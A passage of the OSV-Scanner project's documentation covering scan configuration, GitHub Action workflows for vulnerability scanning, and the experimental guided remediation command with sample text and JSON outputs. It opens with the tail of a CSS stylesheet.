color: #f5f6fa; } .nl { color: #d0d0d0; } .nn { color: #f5f6fa; text-decoration: underline; } .nx, .py { color: #d0d0d0; } .nt { color: #6ab825; font-weight: bold; } .nv { color: #40ffff; } .ow { color: #6ab825; font-weight: bold; } .w { color: #666666; } .mb, .mf, .mh, .mi, .mo { color: #3677a9; } .sb, .sc, .sd, .s2, .se, .sh, .si { color: #ed9d13; } .sx { color: #ffa500; } .sr, .s1, .ss { color: #ed9d13; } .bp { color: #24909d; } .vc, .vg, .vi { color: #40ffff; } .il { color: #3677a9; } } /* Comment */ /* Error */ /* Escape */ /* Generic */ /* Keyword */ /* Literal */ /* Name */ /* Operator */ /* Other */ /* Punctuation */ /* Comment.Hashbang */ /* Comment.Multiline */ /* Comment.Preproc */ /* Comment.PreprocFile */ /* Comment.Single */ /* Comment.Special */ /* Generic.Deleted */ /* Generic.Emph */ /* Generic.Error */ /* Generic.Heading */ /* Generic.Inserted */ /* Generic.Output */ /* Generic.Prompt */ /* Generic.Strong */ /* Generic.Subheading */ /* Generic.Traceback */ /* Keyword.Constant */ /* Keyword.Declaration */ /* Keyword.Namespace */ /* Keyword.Pseudo */ /* Keyword.Reserved */ /* Keyword.Type */ /* Literal.Date */ /* Literal.Number */ /* Literal.String */ /* Name.Attribute */ /* Name.Builtin */ /* Name.Class */ /* Name.Constant */ /* Name.Decorator */ /* Name.Entity */ /* Name.Exception */ /* Name.Function */ /* Name.Label */ /* Name.Namespace */ /* Name.Other */ /* Name.Property */ /* Name.Tag */ /* Name.Variable */ /* Operator.Word */ /* Text.Whitespace */ /* Literal.Number.Bin */ /* Literal.Number.Float */ /* Literal.Number.Hex */ /* Literal.Number.Integer */ /* Literal.Number.Oct */ /* Literal.String.Backtick */ /* Literal.String.Char */ /* Literal.String.Doc */ /* Literal.String.Double */ /* Literal.String.Escape */ /* Literal.String.Heredoc */ /* Literal.String.Interpol */ /* Literal.String.Other */ /* Literal.String.Regex */ /* Literal.String.Single */ /* Literal.String.Symbol */ /* Name.Builtin.Pseudo */ /* Name.Variable.Class */ /* 
Name.Variable.Global */ /* Name.Variable.Instance */ /* Literal.Number.Integer.Long */ ================================================ FILE: docs/configuration.md ================================================ --- layout: page permalink: /configuration/ nav_order: 5 --- # Configuration To configure scanning, place an osv-scanner.toml file in the scanned file's directory. This does not propagate to child directories. **Example:** ``` /Cargo.lock /osv-scanner.toml (1) /child-dir/go.mod /child-dir/osv-scanner.toml (2) /child-dir/nested-dir/package-lock.json ``` `osv-scanner.toml (1)` will only apply to `Cargo.lock`, `osv-scanner.toml (2)` will only apply to `go.mod`, and no config will apply to `package-lock.json`. To override `osv-scanner.toml` files, pass the `--config=/path/to/config.toml` flag with the path to the configuration you want to apply instead. This will apply `config.toml` to all files parsed, and ignore `osv-scanner.toml` in all directories. ## Ignore vulnerabilities by ID To ignore a vulnerability, enter the ID under the `IgnoredVulns` key. Optionally, add an expiry date (`ignoreUntil`) and a reason, so that the exception is documented and does not stay in place indefinitely. ### Example ```toml [[IgnoredVulns]] id = "GO-2022-0968" # ignoreUntil = 2022-11-09 # Optional exception expiry date reason = "No ssh servers are connected to or hosted in Go lang" [[IgnoredVulns]] id = "GO-2022-1059" # ignoreUntil = 2022-11-09 # Optional exception expiry date reason = "No external http servers are written in Go lang." ``` Ignoring a vulnerability will also ignore vulnerabilities that are considered aliases of that vulnerability. 
## Override packages You can specify overrides for particular packages to have them either ignored entirely or to set their license using the `PackageOverrides` key: ```toml [[PackageOverrides]] # One or more fields to match each package against: name = "lib" version = "1.0.0" ecosystem = "Go" group = "dev" # Actions to take for matching packages: ignore = true # Ignore this package completely, including both reporting vulnerabilities and license violations vulnerability.ignore = true # Ignore vulnerabilities for this package, while still checking the license (if not also ignored) license.ignore = true # Ignore the license of the package, while still checking for vulnerabilities (if not also ignored) license.override = ["MIT", "0BSD"] # Override the license of the package, if it is not ignored from license scanning completely effectiveUntil = 2022-11-09 # Optional exception expiry date, after which the override will no longer apply reason = "abc" # Optional reason for the override, to explain why it was added ``` Overrides are applied if all the configured fields match, enabling you to create very broad or very specific overrides based on your needs: ```toml # ignore everything in the current directory [[PackageOverrides]] ignore = true # ignore a particular group [[PackageOverrides]] group = "dev" ignore = true # ignore a particular ecosystem [[PackageOverrides]] ecosystem = "go" ignore = true # ignore packages named "axios" regardless of ecosystem or group [[PackageOverrides]] name = "axios" ignore = true # ignore packages named "axios" in the npm ecosystem that are in the dev group [[PackageOverrides]] name = "axios" ecosystem = "npm" group = "dev" ignore = true # ... and so on ``` ## Go Version Override Use the `GoVersionOverride` key to override the Go version used for scanning. This is useful when the scanner fails to detect the correct Go version or when you want to force a specific version. ### Example ```toml # Do not add a prefix (e.g. 
go1.20.0 is just 1.20.0) GoVersionOverride = "1.20.0" ``` ================================================ FILE: docs/contribute.md ================================================ --- layout: page permalink: /contribute/ nav_order: 9 --- # Contribute ## Report Problems If you have what looks like a bug, please use the [Github issue tracking system](https://github.com/google/osv-scanner/issues). Before you file an issue, please search existing issues to see if your issue is already covered. ## Contributing to `osv-scanner` See [CONTRIBUTING.md](https://github.com/google/osv-scanner/blob/main/CONTRIBUTING.md) for general contribution information and for details on how to contribute [code](https://github.com/google/osv-scanner/blob/main/CONTRIBUTING.md/#contributing-code) and [documentation](https://github.com/google/osv-scanner/blob/main/CONTRIBUTING.md/#contributing-documentation). ================================================ FILE: docs/docs.Dockerfile ================================================ # Use an official Ruby runtime as a parent image. FROM ruby:3@sha256:cddc8a7877ed0213dbd4a3cf726e357ac27e493fefa8b5350e7936f4ec02018e # Set the working directory in the container. WORKDIR /usr/src/app # Copy the Gemfile and Gemfile.lock. # This is done first to leverage Docker's layer caching. COPY ./Gemfile* ./ # Install the dependencies. RUN bundle install # Copy the rest of the documentation files. COPY ./ ./ # Expose port 4000 for the Jekyll server. EXPOSE 4000 # The command to run when the container starts. # --host 0.0.0.0 is important to make the server accessible from outside the container. CMD ["bundle", "exec", "jekyll", "serve", "--host", "0.0.0.0"] ================================================ FILE: docs/experimental.md ================================================ --- layout: page permalink: /experimental/ nav_order: 8 has_children: true --- # Experimental Features {: .no_toc } These features are currently under development. 
While their functionality may be subject to change, they are available for you to try. {: .note } Features and flags with the `experimental` prefix might change or be removed with only a minor version update. ================================================ FILE: docs/github-action.md ================================================ --- layout: page permalink: /github-action/ nav_order: 7 --- # GitHub Action {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
OSV-Scanner is available as a CI/CD Action. We currently offer two different reusable workflows for GitHub: 1. A workflow that triggers a scan with each [pull request](./github-action.md#scan-on-pull-request) and will only report new vulnerabilities introduced through the pull request. 2. A workflow that performs a full vulnerability scan, which can be configured to scan on pushes or a [regular schedule](./github-action.md#scheduled-scans). The full vulnerability scan can also be configured to run [on release](./github-action.md#scan-on-release) to prevent releasing with known vulnerabilities in dependencies. Currently, there are no prebuilt workflows for other platforms, but we welcome any contributions for this! ## Scan on pull request Scanning your project on each pull request can help you keep vulnerabilities out of your project. This GitHub Action compares a vulnerability scan of the target branch to a vulnerability scan of the feature branch, and will fail if there are new vulnerabilities introduced through the feature branch. You may choose to [prevent merging](https://docs.github.com/en/repositories/configuring-branches-and-merges-in-your-repository/managing-protected-branches/about-protected-branches#require-status-checks-before-merging) if new vulnerabilities are introduced, but by default the check will only warn users. ### Instructions In your project repository, create a new file `.github/workflows/osv-scanner-pr.yml`. Include the following in the `osv-scanner-pr.yml` file: ```yml name: OSV-Scanner PR Scan # Change "main" to your default branch if you use a different name, i.e. "master" on: pull_request: branches: [main] merge_group: branches: [main] permissions: # Required to upload SARIF file to CodeQL. 
See: https://github.com/github/codeql-action/issues/2117 actions: read # Require writing security events to upload SARIF file to security tab security-events: write # Only need to read contents contents: read jobs: scan-pr: uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable-pr.yml@v2.3.4" ``` ### View results Results may be viewed by clicking on the details of the failed action, either from your project's actions tab or directly on the PR. | OSV-Scanner PR Check Failing | PR Scanning Check Output | | :---------------------------------------------------------------------------------------------------------------------------: | :-----------------------------------------------------------------------: | | ![Screenshot of PR introducing a vulnerable dependency, and osv-scanner blocking check](images/github-action-PR-scanning.png) | ![Screenshot of osv-scanner output](images/github-action-scan-output.png) | Results are also included in GitHub annotations on the "Files changed" tab for the PR. ## Scheduled scans Regularly scanning your project for vulnerabilities can alert you to new vulnerabilities in your dependency tree. This GitHub Action will scan your project on a set schedule and report all known vulnerabilities. If vulnerabilities are found the action will return a failed status. ### Instructions In your project repository, create a new file `.github/workflows/osv-scanner-scheduled.yml`. Include the following in the `osv-scanner-scheduled.yml` file: ```yml name: OSV-Scanner Scheduled Scan on: schedule: - cron: "30 12 * * 1" # Change "main" to your default branch if you use a different name, i.e. "master" push: branches: [main] permissions: # Required to upload SARIF file to CodeQL. 
See: https://github.com/github/codeql-action/issues/2117 actions: read # Require writing security events to upload SARIF file to security tab security-events: write # Only need to read contents contents: read jobs: scan-scheduled: uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v2.3.4" ``` As written, the scanner will run at 12:30 pm UTC every Monday, and also on every push to the main branch. You can change the schedule by following the instructions [here](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#schedule). The `uses:` line references the reusable workflow by the `v2.3.4` tag; because a tag can be moved, you can instead reference the full commit SHA of that release (`...osv-scanner-reusable.yml@<full-commit-sha>`) so that the workflow code cannot change without an edit to this file. ### View results Maintainers can review results of the scan by navigating to their project's `security > code scanning` tab. Vulnerability details can also be viewed by clicking on the details of the failed action. | OSV-Scanner Code Scanning Tab | Code Scanning Detailed Entry | | :------------------------------------------------------------------------------: | :-------------------------------------------------------------------------------------------: | | ![Image of results in code scanning tab](images/github-action-code-scanning.png) | ![Image of details of specific in code scanning entry](images/github-action-code-details.png) | ## Scan on release Here is an example of blocking on release, though the actual implementation will heavily depend on your specific release process. ```yml name: Go Release Process on: push: tags: - "*" # triggers only if push new tag version, like `0.8.4` or else permissions: # Required to upload SARIF file to CodeQL. 
See: https://github.com/github/codeql-action/issues/2117 actions: read # Require writing security events to upload SARIF file to security tab security-events: write # to fetch code (actions/checkout) contents: read jobs: osv-scan: uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable-pr.yml@v2.3.2" with: # Only scan the top level go.mod file without recursively scanning directories since # this pipeline is about releasing the go module and binary scan-args: |- ./ permissions: # Require writing security events to upload SARIF file to security tab security-events: write tests: name: Run unit tests ... release: needs: # Needs both tests and osv-scan to pass - tests - osv-scan # Your actual release steps steps: ... ``` ### View results Results may be viewed by clicking on the details of the failed release action from the action tab. ## Customization The GitHub Actions have the following optional inputs: - `scan-args`: This value is passed to `osv-scanner` CLI after being split by each line. See the [usage](./usage.md) page for the available options. The `--format` and `--output` flags are already set by the reusable workflow and should not be overridden here. Default: ```bash --recursive # Recursively scan subdirectories ./ # Start the scan from the root of the repository ``` - `results-file-name`: This is the name of the final SARIF file uploaded to GitHub. Default: `results.sarif` - `download-artifact`: Optional artifact to download for scanning. Can be used if you need to do some preprocessing to prepare the lockfiles for scanning. If the file names in the artifact are not standard lockfile names, make sure to add custom scan-args to specify the lockfile type and path (see [specify lockfiles](./usage.md#specify-lockfiles)). - `upload-sarif`: Whether to upload the results to Security > Code Scanning. Defaults to `true`. - `fail-on-vuln`: Whether to fail the workflow when a vulnerability is found. Defaults to `true`. 
- `matrix-property`: Optional, adds support for matrix strategies by inserting a unique variable per job run. (E.g. `amd64-`) Defaults to `""`.
Examples #### Scan specific lockfiles ```yml jobs: scan-pr: uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v2.3.4" with: scan-args: |- --lockfile=./path/to/lockfile1 --lockfile=requirements.txt:./path/to/python-lockfile2.txt ``` #### Default arguments ```yml jobs: scan-pr: uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v2.3.4" with: scan-args: |- --recursive ./ ``` #### Using download-artifact input to support preprocessing ```yml jobs: extract-deps: name: Extract Dependencies # ... steps: # ... Steps to extract your dependencies - name: "upload osv-scanner deps" # Upload the deps uses: actions/upload-artifact@v4 with: name: converted-OSV-Scanner-deps path: osv-scanner-deps.json retention-days: 2 vuln-scan: name: Vulnerability scanning # makes sure the extraction step is completed before running the scanner needs: extract-deps uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v2.3.4" with: # Download the artifact uploaded in extract-deps step download-artifact: converted-OSV-Scanner-deps # Scan only the file inside the uploaded artifact scan-args: |- --lockfile=osv-scanner:osv-scanner-deps.json permissions: # Needed to upload the SARIF results to code-scanning dashboard. security-events: write contents: read actions: read ``` #### Using download-artifact with matrix ```yml jobs: extract-deps: strategy: fail-fast: false matrix: platform: [ {target_arch: amd64}, {target_arch: armv7}, {target_arch: armhf}, {target_arch: aarch64} ] name: Extract Dependencies # ... steps: # ... 
Steps to extract your dependencies for each matrix run - name: "upload osv-scanner deps" # Upload the deps uses: actions/upload-artifact@v4 with: name: ${{ matrix.platform.target_arch }}-OSV-Scanner-deps path: osv-scanner-deps.json retention-days: 2 vuln-scan: needs: - extract-deps strategy: fail-fast: false matrix: platform: [ {target_arch: amd64}, {target_arch: armv7}, {target_arch: armhf}, {target_arch: aarch64} ] uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v2.3.4" with: download-artifact: "${{ matrix.platform.target_arch }}-OSV-Scanner-deps" matrix-property: "${{ matrix.platform.target_arch }}-" scan-args: |- --lockfile=osv-scanner:osv-scanner-deps.json --recursive ./ permissions: security-events: write contents: read actions: read ```
================================================ FILE: docs/guided-remediation.md ================================================ --- layout: page permalink: /experimental/guided-remediation/ parent: Experimental Features nav_order: 3 --- # Guided Remediation Experimental {: .label } {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
Guided remediation (`osv-scanner fix`) aims to help developers with fixing the high number of known vulnerabilities in dependencies typically reported by vulnerability scanners by providing a small number of actionable steps. This tool provides several options to users for how to prioritise and remediate their vulnerabilities, with easy to understand information on how we arrived at these options and how to compare them. This includes features such as: - Resolution and analysis of the entire transitive graph (leveraging [deps.dev](https://deps.dev)) to determine the minimal changes required to remove vulnerabilities. - Prioritising direct dependency upgrades by the total number of transitive vulnerabilities fixed. - Prioritising vulnerabilities by dependency depth, severity, and whether to care about dev-only dependencies. - Modification of package manifest and lockfiles (e.g. `package.json`/`package-lock.json`) to fix vulnerabilities. - Different strategies with different risk/reward ratios (e.g. in-place fixes vs relocking). {: .note } This feature is experimental and might change or be removed with only a minor version update. 
### Supported strategies We currently support remediating vulnerabilities in the following files: | Ecosystem | File Format (Type) | Supported [Remediation Strategies](#remediation-strategies) | | :-------- | :---------------------------------------------------------------------------------------- | :---------------------------------------------------------- | | npm | `package-lock.json` (lockfile) | [`in-place`](#in-place-lockfile-changes) | | npm | `package.json` (manifest) | [`relock`](#relock-and-relax-direct-dependencies) | | Maven | `pom.xml` (manifest)[note](#pom-note) | [`override`](#override-dependency-versions) | {: .note #pom-note} By default, the tool only checks dependencies that are actually present in a POM's dependency graph - it will not detect vulnerabilities in `<dependencyManagement>` dependencies if they are not actually used when resolving the POM. The [`--maven-fix-management`](#maven-flags) flag can be used to also fix them. ## Basic usage To fix as many vulnerabilities as possible in your `package-lock.json` file [in-place](#in-place-lockfile-changes), you can use the following command: ```bash osv-scanner fix --strategy=in-place -L path/to/package-lock.json ``` Alternatively, to potentially resolve even more vulnerabilities with larger (potentially breaking) changes, you can [regenerate your lockfile and update your direct dependencies](#relock-and-relax-direct-dependencies) with the following command: ```bash osv-scanner fix --strategy=relax -M path/to/package.json -L path/to/package-lock.json ``` For Maven `pom.xml` files, you can update direct dependencies and [add version overrides](#override-dependency-versions) to your POM's `<dependencyManagement>` section with the following command: ```bash osv-scanner fix --strategy=override -M path/to/pom.xml ``` {: .warning } The subcommand will modify your manifest and lockfile. Make sure you commit or back up your files before running. 
{: .note } The subcommand will not reinstall your `node_modules/` - you will need to manually run `npm ci` to install dependencies. If you wish to remediate only specific vulnerabilities, you may specify OSV IDs using the `--vulns` flag. [See all remediation flags](#remediation-flags). ### Output formats Non-interactive mode outputs to the terminal the actions taken and vulnerabilities remediated. The output format can be controlled with the `--format` flag. {: .highlight } The output formats may change with minor version updates. #### Text (default) The default format. ```bash osv-scanner fix --format text --strategy=in-place -L path/to/package-lock.json ```
Sample in-place text output ``` Scanning path/to/package-lock.json... Found 55 vulnerabilities matching the filter Can fix 25/55 matching vulnerabilities by changing 21 dependencies UPGRADED-PACKAGE: lodash,4.17.20,4.17.21 UPGRADED-PACKAGE: minimist,1.2.0,1.2.8 UPGRADED-PACKAGE: ws,6.2.1,6.2.3 UPGRADED-PACKAGE: ws,7.1.2,7.5.10 UPGRADED-PACKAGE: acorn,5.7.3,5.4.1 UPGRADED-PACKAGE: acorn,6.0.2,6.4.2 UPGRADED-PACKAGE: acorn,7.1.0,7.4.1 UPGRADED-PACKAGE: ansi-regex,3.0.0,3.0.1 UPGRADED-PACKAGE: dat.gui,0.7.3,0.7.9 UPGRADED-PACKAGE: get-func-name,2.0.0,2.0.2 UPGRADED-PACKAGE: glob-parent,5.0.0,5.1.2 UPGRADED-PACKAGE: json5,2.1.0,2.2.3 UPGRADED-PACKAGE: minimist,1.2.5,1.2.8 UPGRADED-PACKAGE: node-fetch,2.6.6,2.7.0 UPGRADED-PACKAGE: path-parse,1.0.6,1.0.7 UPGRADED-PACKAGE: pathval,1.1.0,1.1.1 UPGRADED-PACKAGE: qs,6.5.2,6.5.3 UPGRADED-PACKAGE: semver,5.5.1,5.7.2 UPGRADED-PACKAGE: semver,5.6.0,5.7.2 UPGRADED-PACKAGE: semver,6.3.0,6.3.1 UPGRADED-PACKAGE: y18n,4.0.0,4.0.3 FIXED-VULN-IDS: GHSA-29mw-wpgm-hmr9,GHSA-35jh-r3h4-6jhm,GHSA-3h5v-q93c-6h6q,GHSA-3h5v-q93c-6h6q,GHSA-4q6p-r6v2-jvc5,GHSA-6chw-6frg-f759,GHSA-6chw-6frg-f759,GHSA-6chw-6frg-f759,GHSA-6fc8-4gx4-v693,GHSA-6fc8-4gx4-v693,GHSA-93q8-gq69-wqmw,GHSA-9c47-m6qq-7p4h,GHSA-c2qf-rxjj-qqgw,GHSA-c2qf-rxjj-qqgw,GHSA-c2qf-rxjj-qqgw,GHSA-c4w7-xm78-47vh,GHSA-chwr-hf3w-c984,GHSA-g6ww-v8xp-vmwg,GHSA-hj48-42vr-x3v9,GHSA-hrpp-h998-j3pp,GHSA-r683-j2x4-v87g,GHSA-vh95-rmgr-6w4m,GHSA-ww39-953v-wcq6,GHSA-xvch-5gv4-984h,GHSA-xvch-5gv4-984h REMAINING-VULNS: 30 UNFIXABLE-VULNS: 30 Rewriting path/to/package-lock.json... ```
```bash osv-scanner fix --format text --strategy=relax -M path/to/package.json -L path/to/package-lock.json ```
Sample relax text output ``` Resolving path/to/package.json... Found 12 vulnerabilities matching the filter Can fix 9/12 matching vulnerabilities by changing 6 dependencies UPGRADED-PACKAGE: mocha,^5.2.0,^9.2.2 UPGRADED-PACKAGE: @google-cloud/cloudbuild,^2.6.0,^4.5.0 UPGRADED-PACKAGE: autoprefixer,^9.3.0,^10.4.20 UPGRADED-PACKAGE: google-closure-library,^20190909.0.0,^20200315.0.0 UPGRADED-PACKAGE: terser,^3.10.11,^4.8.1 UPGRADED-PACKAGE: yargs,^12.0.2,^13.3.2 FIXED-VULN-IDS: GHSA-4wf5-vphf-c2xc,GHSA-7fh5-64p2-3v2j,GHSA-7v5v-9h63-cj86,GHSA-f8q6-p94x-37v3,GHSA-h755-8qp9-cq85,GHSA-p9pc-299p-vxgp,GHSA-vh5w-fg69-rc8m,GHSA-vh95-rmgr-6w4m,GHSA-xvch-5gv4-984h REMAINING-VULNS: 3 UNFIXABLE-VULNS: 3 Rewriting path/to/package.json... Shelling out to regenerate lockfile... Executing `/usr/bin/npm install --package-lock-only`... ```
```bash osv-scanner fix --format text --strategy=override -M path/to/pom.xml ```
Sample override output ``` Resolving path/to/pom.xml... Found 60 vulnerabilities matching the filter Can fix 44/60 matching vulnerabilities by overriding 24 dependencies OVERRIDE-PACKAGE: io.atomix:atomix,3.1.6 OVERRIDE-PACKAGE: org.apache.pdfbox:pdfbox,2.0.24 OVERRIDE-PACKAGE: xerces:xercesImpl,2.12.2 OVERRIDE-PACKAGE: com.google.guava:guava,32.0.0-jre OVERRIDE-PACKAGE: org.apache.mina:mina-core,2.0.27 OVERRIDE-PACKAGE: com.fasterxml.jackson.core:jackson-databind,2.12.7.1 OVERRIDE-PACKAGE: io.netty:netty-handler,4.1.94.Final OVERRIDE-PACKAGE: org.apache.commons:commons-compress,1.26.0 OVERRIDE-PACKAGE: org.apache.commons:commons-configuration2,2.10.1 OVERRIDE-PACKAGE: org.apache.shiro:shiro-web,1.13.0 OVERRIDE-PACKAGE: org.eclipse.jgit:org.eclipse.jgit,5.13.3.202401111512-r OVERRIDE-PACKAGE: com.nimbusds:nimbus-jose-jwt,9.37.2 OVERRIDE-PACKAGE: commons-io:commons-io,2.14.0 OVERRIDE-PACKAGE: io.netty:netty,3.9.8.Final OVERRIDE-PACKAGE: io.netty:netty-common,4.1.115.Final OVERRIDE-PACKAGE: org.apache.directory.api:api-ldap-model,1.0.0-M31 OVERRIDE-PACKAGE: org.apache.shiro:shiro-core,1.13.0 OVERRIDE-PACKAGE: org.eclipse.jetty:jetty-http,12.0.12 OVERRIDE-PACKAGE: org.eclipse.jetty:jetty-server,9.4.56.v20240826 OVERRIDE-PACKAGE: org.glassfish.jersey.core:jersey-common,2.34 OVERRIDE-PACKAGE: xalan:xalan,2.7.3 OVERRIDE-PACKAGE: org.apache.thrift:libthrift,0.14.0 OVERRIDE-PACKAGE: org.apache.tomcat.embed:tomcat-embed-core,8.5.99 OVERRIDE-PACKAGE: io.netty:netty-codec,4.1.68.Final FIXED-VULN-IDS: 
GHSA-2fqw-684c-pvp7,GHSA-2h3j-m7gr-25xj,GHSA-3p86-9955-h393,GHSA-4265-ccf5-phj5,GHSA-4g9r-vxhx-9pgx,GHSA-4jhc-wjr3-pwh2,GHSA-5h29-qq92-wj7f,GHSA-5mg8-w23w-74h3,GHSA-6mcm-j9cj-3vc3,GHSA-6mjq-h674-j845,GHSA-6vqp-h455-42mr,GHSA-6vvh-5794-vpmj,GHSA-76h9-2vwh-w278,GHSA-78wr-2p64-hpwj,GHSA-7fr2-94h7-ccg2,GHSA-7g45-4rm6-3mm3,GHSA-7grw-6pjh-jpc9,GHSA-7j4h-8wpf-rqfh,GHSA-9339-86wc-4qgf,GHSA-9w38-p64v-xpmv,GHSA-c43q-5hpj-4crv,GHSA-cx3q-cv6w-mx4h,GHSA-fg3j-q579-v8x4,GHSA-g2fg-mr77-6vrm,GHSA-g7p8-r2ch-4rmf,GHSA-g8m5-722r-8whq,GHSA-gvpg-vgmx-xg6w,GHSA-h65f-jvqw-m9fj,GHSA-hhw5-c326-822h,GHSA-jc7h-c423-mpjc,GHSA-jjjh-jjxp-wpff,GHSA-m4h3-7mc2-v295,GHSA-mf27-wg66-m8f5,GHSA-mm9x-g8pc-w292,GHSA-mvr2-9pj6-7w5j,GHSA-pmhc-2g4f-85cg,GHSA-q446-82vq-w674,GHSA-qh8g-58pp-2wxh,GHSA-rgv9-q543-rqg4,GHSA-vmqm-g3vh-847m,GHSA-w4jq-qh47-hvjq,GHSA-xfv3-rrfm-f2rv,GHSA-xjp4-hw94-mvp5,GHSA-xq3w-v528-46rv REMAINING-VULNS: 16 UNFIXABLE-VULNS: 15 Rewriting path/to/pom.xml... ```
#### JSON Outputs the results as a JSON object to stdout, with all other output being directed to stderr - this makes it safe to redirect the output to a file. The `json` format is expected to be stable. It is intended to be suitable for integration with automated tooling. ```bash osv-scanner fix --format json --strategy=relax -M path/to/package.json ```
Sample relax JSON output ```json { "path": "path/to/package.json", "ecosystem": "npm", "strategy": "relax", "vulnerabilities": [ { "id": "GHSA-gcx4-mw62-g8wm", "packages": [ { "name": "rollup", "version": "1.32.1" } ], "unactionable": true }, { "id": "GHSA-h755-8qp9-cq85", "packages": [ { "name": "protobufjs", "version": "6.11.3" } ] }, { "id": "GHSA-pfq8-rq6v-vf5m", "packages": [ { "name": "html-minifier", "version": "4.0.0" } ], "unactionable": true }, { "id": "GHSA-xvch-5gv4-984h", "packages": [ { "name": "minimist", "version": "0.0.8" } ] } ], "patches": [ { "packageUpdates": [ { "name": "@google-cloud/cloudbuild", "versionFrom": "^2.6.0", "versionTo": "^4.7.0", "transitive": false } ], "fixed": [ { "id": "GHSA-h755-8qp9-cq85", "packages": [ { "name": "protobufjs", "version": "6.11.3" } ] } ] }, { "packageUpdates": [ { "name": "mocha", "versionFrom": "^5.2.0", "versionTo": "^8.4.0", "transitive": false } ], "fixed": [ { "id": "GHSA-xvch-5gv4-984h", "packages": [ { "name": "minimist", "version": "0.0.8" } ] } ] } ] } ```
```bash osv-scanner fix --format json --strategy=override -M path/to/pom.xml ```
Sample override JSON output ```json { "path": "path/to/pom.xml", "ecosystem": "Maven", "strategy": "override", "vulnerabilities": [ { "id": "GHSA-3832-9276-x7gf", "packages": [ { "name": "commons-httpclient:commons-httpclient", "version": "3.0.1" } ], "unactionable": true }, { "id": "GHSA-56h3-78gp-v83r", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-6hgm-866r-3cjv", "packages": [ { "name": "commons-collections:commons-collections", "version": "3.2.1" } ] }, { "id": "GHSA-6phf-73q6-gh87", "packages": [ { "name": "commons-beanutils:commons-beanutils", "version": "1.7.0" } ] }, { "id": "GHSA-78wr-2p64-hpwj", "packages": [ { "name": "commons-io:commons-io", "version": "2.1" } ] }, { "id": "GHSA-7rf3-mqpx-h7xg", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-c27h-mcmw-48hv", "packages": [ { "name": "org.codehaus.jackson:jackson-mapper-asl", "version": "1.8.8" } ], "unactionable": true }, { "id": "GHSA-cgp8-4m63-fhh5", "packages": [ { "name": "commons-net:commons-net", "version": "1.4.1" } ] }, { "id": "GHSA-fjq5-5j5f-mvxh", "packages": [ { "name": "commons-collections:commons-collections", "version": "3.2.1" } ] }, { "id": "GHSA-grr4-wv38-f68w", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-gwrp-pvrq-jmwv", "packages": [ { "name": "commons-io:commons-io", "version": "2.1" } ] }, { "id": "GHSA-q6g2-g7f3-rr83", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-r6j9-8759-g62w", "packages": [ { "name": "org.codehaus.jackson:jackson-mapper-asl", "version": "1.8.8" } ], "unactionable": true }, { "id": "GHSA-x27m-9w8j-5vcw", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] } ], "patches": [ { "packageUpdates": [ { "name": "org.codehaus.jettison:jettison", "versionFrom": "1.1", "versionTo": "1.5.4", "transitive": true } ], "fixed": [ { "id": 
"GHSA-56h3-78gp-v83r", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-7rf3-mqpx-h7xg", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-grr4-wv38-f68w", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-q6g2-g7f3-rr83", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-x27m-9w8j-5vcw", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] } ] }, { "packageUpdates": [ { "name": "commons-collections:commons-collections", "versionFrom": "3.2.1", "versionTo": "3.2.2", "transitive": true } ], "fixed": [ { "id": "GHSA-6hgm-866r-3cjv", "packages": [ { "name": "commons-collections:commons-collections", "version": "3.2.1" } ] }, { "id": "GHSA-fjq5-5j5f-mvxh", "packages": [ { "name": "commons-collections:commons-collections", "version": "3.2.1" } ] } ] }, { "packageUpdates": [ { "name": "commons-io:commons-io", "versionFrom": "2.1", "versionTo": "2.14.0", "transitive": false } ], "fixed": [ { "id": "GHSA-78wr-2p64-hpwj", "packages": [ { "name": "commons-io:commons-io", "version": "2.1" } ] }, { "id": "GHSA-gwrp-pvrq-jmwv", "packages": [ { "name": "commons-io:commons-io", "version": "2.1" } ] } ] }, { "packageUpdates": [ { "name": "commons-beanutils:commons-beanutils", "versionFrom": "1.7.0", "versionTo": "1.9.4", "transitive": true } ], "fixed": [ { "id": "GHSA-6phf-73q6-gh87", "packages": [ { "name": "commons-beanutils:commons-beanutils", "version": "1.7.0" } ] } ] }, { "packageUpdates": [ { "name": "commons-net:commons-net", "versionFrom": "1.4.1", "versionTo": "3.9.0", "transitive": false } ], "fixed": [ { "id": "GHSA-cgp8-4m63-fhh5", "packages": [ { "name": "commons-net:commons-net", "version": "1.4.1" } ] } ] } ] } ```
## Scripted usage The non-interactive mode, in combination with [other flags](#remediation-flags), can be used in scripts to automatically apply and test remediation patches. Check out our [sample Python script](https://github.com/google/osv-scanner/blob/main/scripts/examples/auto_guided_remediation.py) that uses `osv-scanner fix` to remediate as many vulnerabilities as possible in an npm project without failing your project's `npm run test`. ## Interactive mode Interactive mode provides a step-by-step process to understand and fix vulnerabilities in your project. {: .note } Interactive mode currently only supports npm manifest and lockfiles. To run it, you can use the following command: ```bash osv-scanner fix --interactive -M path/to/package.json -L path/to/package-lock.json ``` {: .warning } The subcommand will modify your manifest and lockfile. Make sure you commit or back up your files before running. The command will launch the Guided Remediation TUI and begin scanning your manifest and lockfile for vulnerabilities. Use the arrow keys to navigate menu items and the `ENTER` key to select. `TAB` can be used to switch to and from the information panel of each option. ![Screenshot 